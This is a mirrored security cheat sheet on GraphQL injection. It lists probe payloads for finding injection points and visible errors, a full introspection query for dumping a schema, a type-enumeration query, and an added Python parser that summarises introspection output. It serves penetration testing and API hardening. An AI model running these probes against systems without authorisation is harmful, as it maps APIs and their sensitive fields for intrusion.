mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
# GraphQL injection

GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.

## Exploit

Identify an injection point

```
?param={__schema{types{name}}}
```

Check if errors are visible

```
?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}
```

Enumerate Database Schema with the following GraphQL query

```
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}
```
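As an added example (not code from the PayloadsAllTheThings page), a Python parser for the JSON that the IntrospectionQuery above returns: it unwraps the nested `ofType` chain produced by the `TypeRef` fragment into ordinary GraphQL type notation and lists every user-defined object type with its fields, which is the quickest way to review what a schema exposes (including deprecated fields, which the query deliberately requests) before deciding whether introspection should stay enabled in production. The sample response is constructed and trimmed to two types.

```python
import json

# Constructed sample of an IntrospectionQuery response, trimmed to two types but
# shaped exactly like the data the FullType/TypeRef fragments above return.
SAMPLE_RESPONSE = json.dumps({"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": None, "directives": [],
    "types": [
        {"kind": "OBJECT", "name": "User", "description": None, "fields": [
            {"name": "id", "args": [], "isDeprecated": False, "deprecationReason": None,
             "type": {"kind": "NON_NULL", "name": None,
                      "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}},
            {"name": "friends", "args": [], "isDeprecated": False, "deprecationReason": None,
             "type": {"kind": "NON_NULL", "name": None, "ofType": {"kind": "LIST", "name": None,
                      "ofType": {"kind": "NON_NULL", "name": None,
                                 "ofType": {"kind": "OBJECT", "name": "User", "ofType": None}}}}},
            {"name": "ssn", "args": [], "isDeprecated": True, "deprecationReason": "internal",
             "type": {"kind": "SCALAR", "name": "String", "ofType": None}}],
         "inputFields": None, "interfaces": [], "enumValues": None, "possibleTypes": None},
        # built-in introspection types start with "__" and are skipped below
        {"kind": "OBJECT", "name": "__Type", "description": None, "fields": [],
         "inputFields": None, "interfaces": [], "enumValues": None, "possibleTypes": None}]}}})


def type_ref_to_str(ref):
    """Collapse a nested TypeRef {kind, name, ofType} into GraphQL notation:
    NON_NULL adds a trailing "!", LIST wraps in "[...]", e.g. -> "[User!]!"."""
    if ref["kind"] == "NON_NULL":
        return type_ref_to_str(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + type_ref_to_str(ref["ofType"]) + "]"
    return ref["name"]


def summarize_schema(response_json):
    """Map each user-defined OBJECT type to [(field, type, is_deprecated), ...].
    Deprecated fields stay listed: includeDeprecated: true still returns them,
    so they remain queryable even if no client is meant to use them."""
    schema = json.loads(response_json)["data"]["__schema"]
    summary = {}
    for t in schema["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        summary[t["name"]] = [(f["name"], type_ref_to_str(f["type"]), f["isDeprecated"])
                              for f in t["fields"] or []]
    return summary


if __name__ == "__main__":
    for type_name, fields in summarize_schema(SAMPLE_RESPONSE).items():
        print(type_name)
        for name, ftype, deprecated in fields:
            print(f"  {name}: {ftype}" + ("  (deprecated)" if deprecated else ""))
```

Feed it the raw response body from your own endpoint instead of `SAMPLE_RESPONSE` to get the same inventory for a real schema.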

Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type

```
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```

## References

* [Introduction to GraphQL](https://graphql.org/learn/)
* [GraphQL Introspection](https://graphql.org/learn/introspection/)